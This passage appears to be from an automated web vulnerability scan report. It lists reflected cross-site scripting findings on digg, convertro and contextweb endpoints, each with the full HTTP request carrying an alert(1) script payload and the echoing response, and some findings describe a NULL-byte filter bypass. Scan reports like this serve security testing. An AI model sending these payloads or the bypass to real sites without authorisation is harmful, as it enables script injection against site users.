gig_pc_digg_1314893420413_13236868544481695a8c53<script>alert(1)</script>8191e201fe7({
"count": 0,
"timestamp": 1314893564,
"total": 0,
"stories": []
});

4.128. http://services.digg.com/1.0/endpoint [method parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://services.digg.com
Path:	/1.0/endpoint

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 7b022<script>alert(1)</script>b58af19e21a was submitted in the method parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll7b022<script>alert(1)</script>b58af19e21a&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript&callback=gig_pc_digg_1314893420413_13236868544481695 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/public_policy/codeofconduct
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Content-Length: 221
Expires: Thu, 01 Sep 2011 16:17:40 GMT
X-Cached: MISS
X-RateLimit-Current: 25
Cache-Control: max-age=300
Date: Thu, 01 Sep 2011 16:12:40 GMT
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3428

gig_pc_digg_1314893420413_13236868544481695({
"status": 403,
"timestamp": 1314893560,
"message": "No such method 'story.getAll7b022<script>alert(1)</script>b58af19e21a' on version 1.0",
"code": 1052
});

4.129. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://services.digg.com
Path:	/1.0/endpoint

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7f5a2<script>alert(1)</script>1f52765a28f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript&callback=gig_pc_digg_1314893420413_13236868544481695&7f5a2<script>alert(1)</script>1f52765a28f=1 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/public_policy/codeofconduct
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Content-Length: 194
X-RateLimit-Current: 31
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3422

gig_pc_digg_1314893420413_13236868544481695({
"status": 403,
"timestamp": 1314893566,
"message": "Unknown argument 7f5a2<script>alert(1)</script>1f52765a28f",
"code": 1001
});

4.130. http://services.digg.com/1.0/endpoint [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://services.digg.com
Path:	/1.0/endpoint

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload 43c47<script>alert(1)</script>e22ca6b0f41 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript43c47<script>alert(1)</script>e22ca6b0f41&callback=gig_pc_digg_1314893420413_13236868544481695 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.iab.net/public_policy/codeofconduct
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Content-Length: 161
X-RateLimit-Current: 27
Server: TornadoServer/0.1
Content-Type: application/json
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3426

{
"status": 403,
"timestamp": 1314893562,
"message": "javascript43c47<script>alert(1)</script>e22ca6b0f41 is not a valid type",
"code": 1030
}

4.131. http://sp1.convertro.com/trax/hit/echosign/0/ [cbi parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sp1.convertro.com
Path:	/trax/hit/echosign/0/

Issue detail

The value of the cbi request parameter is copied into the HTML document as plain text between tags. The payload 35ebe<script>alert(1)</script>d01db318288 was submitted in the cbi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trax/hit/echosign/0/?bts=1314797651417&sid=&mid=&eid=&cid=&jid=&typ=&val=1&isa=&pag=http%3A//www.echosign.com/&ref=http%3A//www.adobe.com/products/catalog.html&fup=0&cbi=nC1x1Y-bjg35ebe<script>alert(1)</script>d01db318288&new=1&nji=0&sts=1311981368&dis=1920x1200x16&plu=gcswf32%2C103183%3Bnpqtplugin%2C77%3Bnpqtplugin2%2C77%3Bnpqtplugin3%2C77%3Bnpqtplugin4%2C77%3Bnpqtplugin5%2C77%3Bnpqtplugin6%2C77%3Bnpqtplugin7%2C77%3BnpdeployJava1%2C602603%3Bnpjp2%2C16026%3Bnpctrl%2C40605310%3BNPAUTHZ%2C2010%3BNPSPWRAP%2C2010%3Bpdf%2C%3Bnpgeplugin%2C%3BnpCIDetect14%2C%3BnpGoogleUpdate3%2C%3Bnpitunes%2C%3Bnpwpidetector%2C14%3Bdefault_plugin%2C&ath=1314797651266&atb=1314797651266&log=0.141%20-%20@%200.002%0A0.149%20-%20i.e%3A%20J%20%0A0.149%20-%20%3E%3E%20te%3A%20%3B%20%3B%20%3B%201 HTTP/1.1
Host: sp1.convertro.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 13:34:04 GMT
Server: Apache/2.2.9
Set-Cookie: cvo_sid1=b0cb9; path=/; domain=.convertro.com; expires=Fri, 01-Jan-2038 00:14:06 GMT
Last-Modified: 1314797644
Etag: 1314797644
Cache-Control: private
X-CVO-RT-NOTICE: ptr-na
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
Vary: Accept-Encoding
Content-Length: 267
Connection: close
Content-Type: text/javascript

$CVO.push(['setUserSid', 'b0cb9']);

if (window.CVO) {
CVO.log("<< H[999999999]");
}
else if (window.$CVO) {
$CVO.INFO("<< H[999999999]");
}
if (window.$CVO.getVersion) {
$CVO.push([ 'trackEventDone', "nC1x1Y-bjg35ebe<script>alert(1)</script>d01db318288" ]);
}

4.132. http://sp1.convertro.com/trax/hit/echosign/0/ [typ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sp1.convertro.com
Path:	/trax/hit/echosign/0/

Issue detail

The value of the typ request parameter is copied into the HTML document as plain text between tags. The payload 98514<script>alert(1)</script>26d24b5de09 was submitted in the typ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trax/hit/echosign/0/?bts=1314797651417&sid=&mid=&eid=&cid=&jid=&typ=98514<script>alert(1)</script>26d24b5de09&val=1&isa=&pag=http%3A//www.echosign.com/&ref=http%3A//www.adobe.com/products/catalog.html&fup=0&cbi=nC1x1Y-bjg&new=1&nji=0&sts=1311981368&dis=1920x1200x16&plu=gcswf32%2C103183%3Bnpqtplugin%2C77%3Bnpqtplugin2%2C77%3Bnpqtplugin3%2C77%3Bnpqtplugin4%2C77%3Bnpqtplugin5%2C77%3Bnpqtplugin6%2C77%3Bnpqtplugin7%2C77%3BnpdeployJava1%2C602603%3Bnpjp2%2C16026%3Bnpctrl%2C40605310%3BNPAUTHZ%2C2010%3BNPSPWRAP%2C2010%3Bpdf%2C%3Bnpgeplugin%2C%3BnpCIDetect14%2C%3BnpGoogleUpdate3%2C%3Bnpitunes%2C%3Bnpwpidetector%2C14%3Bdefault_plugin%2C&ath=1314797651266&atb=1314797651266&log=0.141%20-%20@%200.002%0A0.149%20-%20i.e%3A%20J%20%0A0.149%20-%20%3E%3E%20te%3A%20%3B%20%3B%20%3B%201 HTTP/1.1
Host: sp1.convertro.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 13:34:04 GMT
Server: Apache/2.2.9
Set-Cookie: cvo_sid1=b0cb9; path=/; domain=.convertro.com; expires=Fri, 01-Jan-2038 00:14:06 GMT
Last-Modified: 1314797644
Etag: 1314797644
Cache-Control: private
X-CVO-RT-NOTICE: ptr-na
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/javascript

$CVO.push(['setUserSid', 'b0cb9']);

if (window.CVO) {
CVO.log("<< H[999999999] E[b0cb9-98514<script>alert(1)</script>26d24b5de09:48991]");
}
else if (window.$CVO) {
$CVO.INFO("<< H[999999999] E[b0cb9-98514<script>
...[SNIP]...

4.133. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0049057"%3balert(1)//8b774be5d3a was submitted in the action parameter. This input was echoed as 49057";alert(1)//8b774be5d3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD%0049057"%3balert(1)//8b774be5d3a&cwrun=200&cwadformat=300X250&cwpid=537740&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; CDSActionTracking6=sR5ROZTWi6dz|66SC8LGNnu59|537740|1998|6721|58320|126995|104420|4|363|27|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3pG7f|3AypH; FC1-WC=^58320_1_3q2AN^58209_1_3q2Hu; V=66SC8LGNnu59; pb_rtb_ev=1:534301.842023e7-29db-4d1c-bd4b-6805881809de.0|534889.v3y4gkoh99wrv.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|535461.3041410246858069995.0|536088.211111708350353.0|531399.1sbvs30c072oq.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8859
Date: Thu, 11 Aug 2011 22:35:19 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:21:59 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104419";var cwadformat="300X250";var ca="VIEWAD.49057";alert(1)//8b774be5d3a";var cr="200";var cw="300";var ch="250";var cads="0";var cp="537740";var ct="104419";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.
...[SNIP]...

4.134. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc9b8"%3balert(1)//29b12867da4 was submitted in the action parameter. This input was echoed as cc9b8";alert(1)//29b12867da4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWADcc9b8"%3balert(1)//29b12867da4&cwrun=200&cwadformat=300X250&cwpid=537740&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102358556&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; cw=cw; FC1-WC=^58320_1_3rrDJ; CDSActionTracking6=e8u7UCx2LPDS|66SC8LGNnu59|537740|1998|6721|58320|126994|104419|3|16|16|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3r5ab|3BXsD; vf=1; V=66SC8LGNnu59; pb_rtb_ev=1:537583.27acd458-36c8-4224-829c-3ed04dd4cb13.0|534889.v3y4gkoh99wrv.0|534301.842023e7-29db-4d1c-bd4b-6805881809de.0|535461.3041410246858069995.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|531292.CM-00000001429329761.0|531399.1sbvs30c072oq.0|536088.211111708350353.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535039.8413bde9-2099-43af-b214-8fee85ef2861.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8858
Date: Thu, 11 Aug 2011 22:40:05 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:26:45 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104419";var cwadformat="300X250";var ca="VIEWADcc9b8";alert(1)//29b12867da4";var cr="200";var cw="300";var ch="250";var cads="0";var cp="537740";var ct="104419";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.
...[SNIP]...

4.135. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 463a3"%3balert(1)//762fd512227 was submitted in the cwadformat parameter. This input was echoed as 463a3";alert(1)//762fd512227 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250463a3"%3balert(1)//762fd512227&cwpid=537740&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; CDSActionTracking6=sR5ROZTWi6dz|66SC8LGNnu59|537740|1998|6721|58320|126995|104420|4|363|27|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3pG7f|3AypH; FC1-WC=^58320_1_3q2AN^58209_1_3q2Hu; V=66SC8LGNnu59; pb_rtb_ev=1:534301.842023e7-29db-4d1c-bd4b-6805881809de.0|534889.v3y4gkoh99wrv.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|535461.3041410246858069995.0|536088.211111708350353.0|531399.1sbvs30c072oq.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP212
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8886
Date: Thu, 11 Aug 2011 22:35:24 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:22:04 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104419";var cwadformat="300X250463a3";alert(1)//762fd512227";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="537740";var ct="104419";var cf="300X250463a3";alert(1)//762fd512227";var cn="1";var epid="";var esid="";

       String.prototyp
...[SNIP]...

4.136. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00efa92"%3balert(1)//928b59cd098 was submitted in the cwadformat parameter. This input was echoed as efa92";alert(1)//928b59cd098 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /TagPublish/getjs.aspx?01RI=345B40EF10F6F97&01NA=ck&action=VIEWAD&cwrun=200&cwadformat=300X250%00efa92"%3balert(1)//928b59cd098&cwpid=537740&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_atf?t=1313102918918&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fassets.nydailynews.com%2Fimgaa7d9'%253balert(1)%2F%2F101192a7b4c%2F2011%2F08%2F12%2Falg_charla-nash_surgery.jpg&refer=http%3A%2F%2Fburp%2Fshow%2F0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; CDSActionTracking6=e8u7UCx2LPDS|66SC8LGNnu59|537740|1998|6721|58320|126994|104419|3|16|16|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3r5ab|3BXsD; V=66SC8LGNnu59; pb_rtb_ev=1:537583.27acd458-36c8-4224-829c-3ed04dd4cb13.0|534889.v3y4gkoh99wrv.0|534301.842023e7-29db-4d1c-bd4b-6805881809de.0|535461.3041410246858069995.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|531292.CM-00000001429329761.0|531399.1sbvs30c072oq.0|536088.211111708350353.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535039.8413bde9-2099-43af-b214-8fee85ef2861.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0; 537740_3_104419_-1=1313102498992; FC1-WC=^58320_1_3rrDJ^54779_1_3rrJu^58199_1_3rrJW; vf=7; cw=cw

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8888
Date: Thu, 11 Aug 2011 22:50:25 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:37:05 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104419";var cwadformat="300X250.efa92";alert(1)//928b59cd098";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="537740";var ct="104419";var cf="300X250.efa92";alert(1)//928b59cd098";var cn="1";var epid="";var esid="";

       String.prototy
...[SNIP]...

4.137. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc511"%3balert(1)//e9fa6f675bf was submitted in the cwheight parameter. This input was echoed as dc511";alert(1)//e9fa6f675bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=537740&cwwidth=300&cwheight=250dc511"%3balert(1)//e9fa6f675bf&cwpnet=1&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102358556&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; cw=cw; FC1-WC=^58320_1_3rrDJ; CDSActionTracking6=e8u7UCx2LPDS|66SC8LGNnu59|537740|1998|6721|58320|126994|104419|3|16|16|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3r5ab|3BXsD; vf=1; V=66SC8LGNnu59; pb_rtb_ev=1:537583.27acd458-36c8-4224-829c-3ed04dd4cb13.0|534889.v3y4gkoh99wrv.0|534301.842023e7-29db-4d1c-bd4b-6805881809de.0|535461.3041410246858069995.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|531292.CM-00000001429329761.0|531399.1sbvs30c072oq.0|536088.211111708350353.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535039.8413bde9-2099-43af-b214-8fee85ef2861.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Thu, 11 Aug 2011 22:40:18 GMT
Content-Length: 8858
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:26:58 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104419";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250dc511";alert(1)//e9fa6f675bf";var cads="0";var cp="537740";var ct="104419";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...

4.138. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ed52"%3balert(1)//c2946f30f57 was submitted in the cwheight parameter. This input was echoed as 4ed52";alert(1)//c2946f30f57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=537740&cwwidth=300&cwheight=2504ed52"%3balert(1)//c2946f30f57&cwpnet=1&cwtagid=104419 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=37M4UCmiRyB6IR1gZ3cdPsPp7dqu0qA-iSvPwwcSCtovToPw-VwALGg; CDSActionTracking6=sR5ROZTWi6dz|66SC8LGNnu59|537740|1998|6721|58320|126995|104420|4|363|27|nydailynews.com|2|8|1|0|2|1|2||1|1|nbV19OwIzkYI9sHccDdTOyNKH2k1Vvuj9xK3Cw1Zw-4^|I|3pG7f|3AypH; FC1-WC=^58320_1_3q2AN^58209_1_3q2Hu; V=66SC8LGNnu59; pb_rtb_ev=1:534301.842023e7-29db-4d1c-bd4b-6805881809de.0|534889.v3y4gkoh99wrv.0|530741.7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0.0|535461.3041410246858069995.0|536088.211111708350353.0|531399.1sbvs30c072oq.0|530739.4e394114-5150-5bce-73fa-628197421391.0|535495.12128760-c15f-11e0-bd76-00259009a9e4.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Thu, 11 Aug 2011 22:35:32 GMT
Content-Length: 8858
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Fri, 12-Aug-2011 01:22:12 GMT; Path=/

function cw_Process() {
   try {
